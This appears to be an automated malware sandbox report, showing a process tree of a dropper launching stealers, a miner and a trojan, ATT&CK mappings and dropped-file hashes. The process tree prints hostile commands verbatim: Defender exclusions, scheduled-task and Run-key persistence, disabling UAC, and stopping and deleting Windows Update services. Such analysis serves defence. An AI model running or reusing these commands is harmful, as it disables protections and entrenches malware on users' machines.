    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:7680
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6456 -s 280
    3⤵
    - Program crash
    PID:7892
- C:\Users\Admin\AppData\Local\Temp\a\putty.exe
  "C:\Users\Admin\AppData\Local\Temp\a\putty.exe"
  2⤵
  PID:5020
- C:\Users\Admin\AppData\Local\Temp\a\v.exe
  "C:\Users\Admin\AppData\Local\Temp\a\v.exe"
  2⤵
  PID:3184
- - C:\Program Files (x86)\Google\Temp\GUM9B80.tmp\GoogleUpdate.exe
    "C:\Program Files (x86)\Google\Temp\GUM9B80.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={4611E087-CB70-244B-9202-F605357A02F4}&lang=en&browser=5&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&brand=CHBF&installdataindex=empty"
    3⤵
    PID:7280
  - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc
      4⤵
      PID:7424
  - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver
      4⤵
      PID:5960
    - - C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
        5⤵
        
        PID:1060
    - - C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
        5⤵
        
        PID:4660
    - - C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateComRegisterShell64.exe"
        5⤵
        
        PID:2288
  - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4xMjIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4xMjEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RDE1N0Y2QzgtQTI1OC00M0Y0LUIwNDMtNUUyNERERkREMDdBfSIgdXNlcmlkPSJ7NzE5NDIzQTMtNzBEOC00OUJBLTgyOTQtRTBGNjEzRUY5MTFGfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezIyMDNDRTYyLUVEMEYtNDlFNS1BRjkxLTY3QzYwOEFBMDhGOH0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xNTA2My4wIiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjE1MSIgbmV4dHZlcnNpb249IjEuMy4zNi4xMjIiIGxhbmc9ImVuIiBicmFuZD0iQ0hCRiIgY2xpZW50PSIiIGlpZD0iezQ2MTFFMDg3LUNCNzAtMjQ0Qi05MjAyLUY2MDUzNTdBMDJGNH0iPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIGluc3RhbGxfdGltZV9tcz0iNTcyNTkiLz48L2FwcD48L3JlcXVlc3Q-
      4⤵
      PID:8124
  - - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
      "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={4611E087-CB70-244B-9202-F605357A02F4}&lang=en&browser=5&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&brand=CHBF&installdataindex=empty" /installsource taggedmi /sessionid "{D157F6C8-A258-43F4-B043-5E24DDFDD07A}"
      4⤵
      PID:7340
- C:\Users\Admin\AppData\Local\Temp\a\INTERNET.exe
  "C:\Users\Admin\AppData\Local\Temp\a\INTERNET.exe"
  2⤵
  PID:5176
- C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe"
  2⤵
  PID:6864
- - C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\oceanzx.exe"
    3⤵
    PID:7568
- C:\Users\Admin\AppData\Local\Temp\a\macrigan2.1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\macrigan2.1.exe"
  2⤵
  PID:8036
- C:\Users\Admin\AppData\Local\Temp\a\p0aw25.exe
  "C:\Users\Admin\AppData\Local\Temp\a\p0aw25.exe"
  2⤵
  PID:7120
- C:\Users\Admin\AppData\Local\Temp\a\clp6.exe
  "C:\Users\Admin\AppData\Local\Temp\a\clp6.exe"
  2⤵
  PID:5608
- - C:\ProgramData\h5gb4fg\g3f31sd.exe
    C:\ProgramData\h5gb4fg\g3f31sd.exe
    3⤵
    PID:5444
- C:\Users\Admin\AppData\Local\Temp\a\redline.exe
  "C:\Users\Admin\AppData\Local\Temp\a\redline.exe"
  2⤵
  PID:3464
- C:\Users\Admin\AppData\Local\Temp\a\dd4add6r.s6xlt.exe
  "C:\Users\Admin\AppData\Local\Temp\a\dd4add6r.s6xlt.exe"
  2⤵
  PID:5784
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
    3⤵
    PID:428
- C:\Users\Admin\AppData\Local\Temp\a\Rebcoana.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Rebcoana.exe"
  2⤵
  PID:5072
- C:\Users\Admin\AppData\Local\Temp\a\BaldiTrojan-x64.exe
  "C:\Users\Admin\AppData\Local\Temp\a\BaldiTrojan-x64.exe"
  2⤵
  PID:7460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c CleanZUpdater.bat
    3⤵
    PID:5376
  - - C:\Baldi\Baldi.exe
      C:\Baldi\Baldi.exe
      4⤵
      PID:7844
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:6200
  - - C:\Baldi\DisableUAC.exe
      C:\Baldi\DisableUAC.exe
      4⤵
      PID:5916
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A922.tmp\A923.bat C:\Baldi\DisableUAC.exe"
        5⤵
        
        PID:3408
      - C:\Windows\system32\reg.exe
        
        reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        
        PID:8084
      - C:\Windows\system32\shutdown.exe
        
        shutdown -r -t 1 -c "BALDI EVIL..."
        6⤵
        
        PID:4800
- C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe
  "C:\Users\Admin\AppData\Local\Temp\a\xmrig.exe"
  2⤵
  PID:8184
- C:\Users\Admin\AppData\Local\Temp\a\evhic3tm.9uob3.exe
  "C:\Users\Admin\AppData\Local\Temp\a\evhic3tm.9uob3.exe"
  2⤵
  PID:3416
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
    3⤵
    PID:6720
- C:\Users\Admin\AppData\Local\Temp\a\a02.exe
  "C:\Users\Admin\AppData\Local\Temp\a\a02.exe"
  2⤵
  PID:6024
- - C:\Users\Admin\AppData\Local\Temp\2.1.1.exe
    C:\Users\Admin\AppData\Local\Temp\2.1.1.exe
    3⤵
    PID:8136
- C:\Users\Admin\AppData\Local\Temp\a\ss49.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ss49.exe"
  2⤵
  PID:5936
- C:\Users\Admin\AppData\Local\Temp\a\kellyzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\kellyzx.exe"
  2⤵
  PID:5568
- C:\Users\Admin\AppData\Local\Temp\a\nigguy_1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\nigguy_1.exe"
  2⤵
  PID:5440
- - C:\Users\Admin\AppData\Local\Temp\stlr.exe
    "C:\Users\Admin\AppData\Local\Temp\stlr.exe"
    3⤵
    PID:2620
- - C:\Users\Admin\AppData\Roaming\nig_guy1.exe
    "C:\Users\Admin\AppData\Roaming\nig_guy1.exe"
    3⤵
    PID:7276
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAZwBkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZwB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AcgBxACMAPgA="
    3⤵
    PID:3776
- C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\tmglobalzx.exe"
  2⤵
  PID:7080
- C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\donpyzx.exe"
  2⤵
  PID:8036
- C:\Users\Admin\AppData\Local\Temp\a\kakazx.exe
  "C:\Users\Admin\AppData\Local\Temp\a\kakazx.exe"
  2⤵
  PID:7328
- C:\Users\Admin\AppData\Local\Temp\a\work.exe
  "C:\Users\Admin\AppData\Local\Temp\a\work.exe"
  2⤵
  PID:2832
- C:\Users\Admin\AppData\Local\Temp\a\updater.exe
  "C:\Users\Admin\AppData\Local\Temp\a\updater.exe"
  2⤵
  PID:8260

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3564

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1072

C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe
"C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe"
1⤵
PID:5748
- C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe
  "C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe"
  2⤵
  PID:5812

C:\Windows\system32\certreq.exe
"C:\Windows\system32\certreq.exe"
1⤵
PID:5552

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Executes dropped EXE
PID:4232

C:\Users\Admin\AppData\Local\Temp\D6F2.exe
C:\Users\Admin\AppData\Local\Temp\D6F2.exe
1⤵
PID:5412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:2164

C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe
C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe
1⤵
PID:7884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
1⤵
PID:6652

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:8084
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:3768
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:6896
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:7412
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4436

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:8048
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:3776
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4748
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1424
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:5880
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:1312
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
  2⤵
  PID:5388
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
  2⤵
  PID:4364
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
  2⤵
  PID:2288
- C:\Windows\System32\reg.exe
  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
  2⤵
  PID:4128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
1⤵
PID:4456
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
  2⤵
  PID:6120

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
1⤵
PID:6668

C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
1⤵
PID:2596

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3adc855 /state1:0x41c64e6d
1⤵
PID:5792

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Scripting

T1064

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

Modify Registry

Scripting

Web Service

Credential Access

Discovery

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleUpdateSetup.exe

Filesize
1.3MB

MD5
ebf39794ba6132055e6114d47bc18941

SHA1
214dead1bd716c58709c39a8180551b737048785

SHA256
8af777d0f92cef2d9040a634527c3753669235589c23129f09855ad0ebe10c6f

SHA512
01e7521af569050acc473fd13c8dd9a781370bd7cefcbc7e953e66ab930f407e9791c9fdb2ab4f368579f16bebb7368bebd2a475351a42d9e2092da0835bffbb

Download Submit
C:\Program Files (x86)\Google\Update\1.3.36.122\goopdate.dll.tmp

Filesize
1.9MB

MD5
ca70fce245caf42ab78bfd0bb979b773

SHA1
c33e97fa1ac27756eaa809bf0f2cf65f30b5ae93

SHA256
77a9411a1534727fed5a4de9105383c26fac3f474c6898bbd9bd4357e9535fa6

SHA512
3d394533f04caeecb0c4e9ed4f77fcbc78db23229b145ba3b9219a0512b841eac5e8862c694c4e57d93788c6a5df6181676c2fc5e89dafa5898b2944a3f63668

Download Submit
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Filesize
152KB

MD5
e4bf1e4d8477fbf8411e274f95a0d528

SHA1
a3ff668cbc56d22fb3b258fabff26bac74a27e21

SHA256
62f622b022d4d8a52baf02bcf0c163f6fd046265cc4553d2a8b267f8eded4b76

SHA512
429d99fc7578d07c02b69e6daf7d020cff9baa0098fbd15f05539cb3b78c3ac4a368dee500c4d14b804d383767a7d5e8154e61d4ab002d610abed4d647e14c70

Download Submit
C:\Program Files (x86)\Microsoft Efxkgq\Evnagqb.com

Filesize
308KB

MD5
ee9f9565049005c3fc1dfd32db706ef8

SHA1
1761611775aa66b437e8e79ae2e7cdb295501bf7

SHA256
41fe567d55eb7815d15fe5f3408a902f5743a42b2d6b58a6eac7455a06e52d28

SHA512
466eb8863f2c91178f197fd560a4b1829946f2910b94f75cc345522ec60b1d0827707628a50627f3ae5f441f239d0f22330c5983ac8f04c2efaea87153ad8a1b

Download Submit
C:\Program Files (x86)\Microsoft Efxkgq\Evnagqb.com

Filesize
308KB

MD5
ee9f9565049005c3fc1dfd32db706ef8

SHA1
1761611775aa66b437e8e79ae2e7cdb295501bf7

SHA256
41fe567d55eb7815d15fe5f3408a902f5743a42b2d6b58a6eac7455a06e52d28

SHA512
466eb8863f2c91178f197fd560a4b1829946f2910b94f75cc345522ec60b1d0827707628a50627f3ae5f441f239d0f22330c5983ac8f04c2efaea87153ad8a1b

Download Submit
C:\Program Files (x86)\Microsoft Efxkgq\Evnagqb.com

Filesize
308KB

MD5
ee9f9565049005c3fc1dfd32db706ef8

SHA1
1761611775aa66b437e8e79ae2e7cdb295501bf7

SHA256
41fe567d55eb7815d15fe5f3408a902f5743a42b2d6b58a6eac7455a06e52d28

SHA512
466eb8863f2c91178f197fd560a4b1829946f2910b94f75cc345522ec60b1d0827707628a50627f3ae5f441f239d0f22330c5983ac8f04c2efaea87153ad8a1b

Download Submit
C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe

Filesize
15.1MB

MD5
651549239e1b3bba64442f92d890db6d

SHA1
55a8d0c1469e943ef454666ff442c7f21cf235b0

SHA256
5f760b7e1de614a5b1eb8f8b92b53f5cf94c8ac6b9db8db71c544c79d151cd91

SHA512
256b9913ef58dd5246b71fa941ccaf3741e839d01afe85ad4a6172314ee297f9c5da3a3107df3cedc9edbf05de807e5322d3490997cbce5219d56e71c0e744ad

Download Submit
C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe

Filesize
15.1MB

MD5
651549239e1b3bba64442f92d890db6d

SHA1
55a8d0c1469e943ef454666ff442c7f21cf235b0

SHA256
5f760b7e1de614a5b1eb8f8b92b53f5cf94c8ac6b9db8db71c544c79d151cd91

SHA512
256b9913ef58dd5246b71fa941ccaf3741e839d01afe85ad4a6172314ee297f9c5da3a3107df3cedc9edbf05de807e5322d3490997cbce5219d56e71c0e744ad

Download Submit
C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe

Filesize
15.1MB

MD5
651549239e1b3bba64442f92d890db6d

SHA1
55a8d0c1469e943ef454666ff442c7f21cf235b0

SHA256
5f760b7e1de614a5b1eb8f8b92b53f5cf94c8ac6b9db8db71c544c79d151cd91

SHA512
256b9913ef58dd5246b71fa941ccaf3741e839d01afe85ad4a6172314ee297f9c5da3a3107df3cedc9edbf05de807e5322d3490997cbce5219d56e71c0e744ad

Download Submit
C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe

Filesize
15.1MB

MD5
651549239e1b3bba64442f92d890db6d

SHA1
55a8d0c1469e943ef454666ff442c7f21cf235b0

SHA256
5f760b7e1de614a5b1eb8f8b92b53f5cf94c8ac6b9db8db71c544c79d151cd91

SHA512
256b9913ef58dd5246b71fa941ccaf3741e839d01afe85ad4a6172314ee297f9c5da3a3107df3cedc9edbf05de807e5322d3490997cbce5219d56e71c0e744ad

Download Submit
C:\Program Files (x86)\Microsoft Krptvw\Mxqekzr.exe

Filesize
15.1MB

MD5
651549239e1b3bba64442f92d890db6d

SHA1
55a8d0c1469e943ef454666ff442c7f21cf235b0

SHA256
5f760b7e1de614a5b1eb8f8b92b53f5cf94c8ac6b9db8db71c544c79d151cd91

SHA512
256b9913ef58dd5246b71fa941ccaf3741e839d01afe85ad4a6172314ee297f9c5da3a3107df3cedc9edbf05de807e5322d3490997cbce5219d56e71c0e744ad

Download Submit
C:\Program Files\AppPatch\NetSyst96.dll

Filesize
239KB

MD5
8c19d83ff359a1b77cb06939c2e5f0cb

SHA1
a01a199e6f6f3e84cef5c7e6251a2b1291217885

SHA256
7baee22c9834bef64f0c1b7f5988d9717855942d87c82f019606d07589bc51a9

SHA512
b241c7b0f6372483faf4630e82d7f609e8450bac17cedaeb8fc7db8157ec5363e153f5cab5188eee6d8b27b366656877d4421122c8e26a0a739b6c5308bde381

Download Submit
C:\ProgramData\GitLibedll\YKNH.exe

Filesize
53.4MB

MD5
23f8cfd3c2e871047c69cbf8d73a3f59

SHA1
86a237c6b2a90346ed80c5fabc9e23b5122ab98b

SHA256
ece8bb0bce1360ce2c78efc29a0961f73a480a45be50241121a4998bdea32f64

SHA512
027bf85c1f474ec6884d39f5a06d5cb15ed366ea858d0a69e56abb575f3d168c1bd29836bdf6996c64fd80fc2799efd790d3e73c00a486cdb283b96b83659935

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
5a8ecfb2661ff9e15e20f4efc7baa704

SHA1
2dda545f20156c55351e70c38234c2a2f5d559f9

SHA256
74417d0527faf935f9199a51acf01f09f7151db5ef3bb3856ee8483febf407a2

SHA512
22ce9cb31df4c2c1309e0c8f7fee386b61bfe209ae1cf3fd4ffb711bd6dedbbe5edfb7c5285162b629a30aacccf92229801d2fe748145f12322fd4076e56bbbc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
d758fd6e6d7342ae84ac856a1e1de721

SHA1
fc90d8957d467ffac7d35361c17b0e9608ae6c12

SHA256
4db4defa269a4a6ae0a257d28a434b1d136169a1738a205f537821b26ebde0d1

SHA512
55e90f0622ab25f1b907a0e0cecbf15021ac238f8fc83d43e803df5ddbd1b2dbe01dfaef67d42581a2522f0157832d079593aa9b297d07542a0ff77546a8a970

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1015B

MD5
736d29c490b51036e3a5a0d722c99e84

SHA1
0235a5fe80a52e28ff5ae44904534faa845b0da6

SHA256
22caf09c1bd3c172d5e2c68c13ef6011df58fa0b34f9a3c76579dff6b82d89fc

SHA512
35bbb39239cbe4084846eaea01080ee67748d15adc52fc1586a1219750a76e85c4b69578b2ae50dabca4b7975824e41f2b40f6e29ca1c9b3068f745a98f40eb0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
906ed8e25a8e7745c49cac82c3763a74

SHA1
f17fd6082e1ea932115fc63e6db7c7f446405dcb

SHA256
1a5e9a2e77711f870b2406c977784ebe7622657e7fe1228d925e9b9bcaf19fda

SHA512
d6100d7417db32ee8713d71f81c29b8230d3472d7885d78c56e2432307adbdb9e8bc509cafa95641cf8f94b98aa2805a9cfadff715bb8072d526a8c7a92dffd9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
a02bda251c823ba0e07a1a8c2e953ba0

SHA1
6b8e4a9f9e5d8263e63b708bdbcc1bb9594e07fb

SHA256
7566388ef5848300159d3b3e7453fc20e9c7184c4c5ef7d3ff63091be8871c77

SHA512
c133910fdbcf809eaff59f76d8237993a71d38ec3cc13d307e93c46e0ddb5e0bf2a5894ca6de22a0c75b59d63a14b45ef4496fdb68113295d73357fd4c4316cd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
288e571884f19d93e8198c11eccb9a0d

SHA1
4fb53ae7fa02957b223eee86a081df533adf4975

SHA256
c469ebc1b5033fa9f3d8b22538e2d7fa8a2a41e27185670ad196324d20d57575

SHA512
204217cfa12df6b877215406e46a3abcf5f10dd04420cada0ddc811576118bcf3fc3f974737b093f825b5c168fa98229d2df425bc76124c5e6bd5674a54abd94

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
12d71ae59eb714f59c88a29a996ecdaa

SHA1
b7f0137d2d12998ef8010817e9ed67d1323e193a

SHA256
87152ba1d2a2ed813db421eaf272db417de02d632740789d73aea64d1551a67a

SHA512
4f86db47bfbb4f16855105b7462f6d616ce907bcfc46e2798aba575e5522fb211d08fbf9951b055e26585d4da85e726a289c7f3ec5daf002e271d98ce319e026

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
6a3a1f2bfa6e69f84562abd429a37820

SHA1
8422fc41fa3e4f1a099975c1f04fc4f443f7cfdc

SHA256
7bcc148a836ac58705a95714ba48e7b038ac0e8791aa53e836d6de0e9473ff81

SHA512
404fd976e619e50f320386aabdd50a3344d2c14eddddaab73df3584d560fe7cd6e456d256aa278393fecb135abfd14ed03db68bfa0519a5d19061bca3710db53

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
10KB

MD5
441d0183b2bfa66027c771ddc46dd145

SHA1
aa01582f5616cb7a3c99dc1901eb7f3e5b17688f

SHA256
42d112a4be6d0f3d72d891754d4e9dad5b895277a90a8febe1cdb99819e9d2ac

SHA512
b35bf24710b83115b8db55dc7e7d0db9a5c302db9fea1accf90272eab5c27e1da56960177e746a6bfee60de0332b377d3d5d71056281f14a3e39759b614926ab

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1

Filesize
264KB

MD5
cee9fc19b81722f2036b7b1394fbb562

SHA1
d1bd55763c7a48ec1ed3d8343b264320cf23b6a8

SHA256
0ec427ecb536624e7a9b667b93f35a6e3ee37c100833edd2c40541fb2fe4e205

SHA512
003add014957cc14c3e417ec39e3f93bec65a89ba84936a957794716d5c2187a4016894b4989c48460632b0e048a2cf1e700cc6109d1878e97b672cff3e35020

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
71KB

MD5
66550a583515c54569a038eb17311eeb

SHA1
25b3eb70ead3ad825701b8174e87c47f76912119

SHA256
6c83569111fcc265739405afcb72f3d98a0e9ec96f50d7c227d81d3cd330e9fc

SHA512
9c01c018fc94c2b79441df030b0a0db3a89d08c5997b80c59ef382e3a267d4db63cc7cdc87bd96193708694cd6578ef1c6aa9fbb74214d929c3ab64a350af369

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
71KB

MD5
f1a751010d17ea528abf71a6d9c98c3c

SHA1
110ebcee04c28ae1051c71842f6cc9cf501a8ba6

SHA256
e59b3f24ddaa3455b476aff380c98266bdd009889b734f20467b17b94b128042

SHA512
